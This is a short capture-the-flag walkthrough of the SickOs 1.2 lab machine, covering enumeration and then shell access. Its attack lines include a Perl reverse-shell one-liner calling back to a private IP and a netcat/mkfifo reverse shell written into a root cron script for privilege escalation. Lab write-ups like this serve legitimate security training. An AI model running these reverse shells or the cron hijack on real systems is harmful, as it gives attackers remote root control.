SickOs: 1.2 Walkthrough
“So in war, the way is to avoid what is strong, and strike at what is weak.” ― Sun Tzu, The Art of War
This is second in following series from SickOs and is independent of the prior releases, scope of challenge is to gain highest privileges on the system.
“So in war, the way is to avoid what is strong, and strike at what is weak.”
― Sun Tzu, The Art of War
Enumeration
All starts with enumeration
📍 We might have to get credentials from web page and access the SSH.
📍 We might have LFI/SQLi/RCE on the web page.
📍 Could be something new…
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10–4.11, Linux 3.16–4.6, Linux 3.2–4.9, Linux 4.4
OpenSSH 5.9p1 Debian 5ubuntu1.8
🔑 It is running linux — Ubuntu
More Enumeration…
- SSH
Just User Enumeration Vuln.
2. HTTP
- Manual Walk + robots.txt + source code
Nothing on this.
- Nikto scan
- Gobuster
Finding POI(Point Of Intrusion)
No luck with this Vulnerabilities.
perl -e ‘use Socket;$i=”192.168.103.195";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
Got rshell with rport 443
Privilege Escalation
Found a cron job which is vulnerable. It is present in /etc/cron.daily
Do the following to get a root shell back…
echo ‘#!/bin/bash’ > update
echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.2 443 >/tmp/f’ >> update
chmod 777 update
catch the shell back when executed.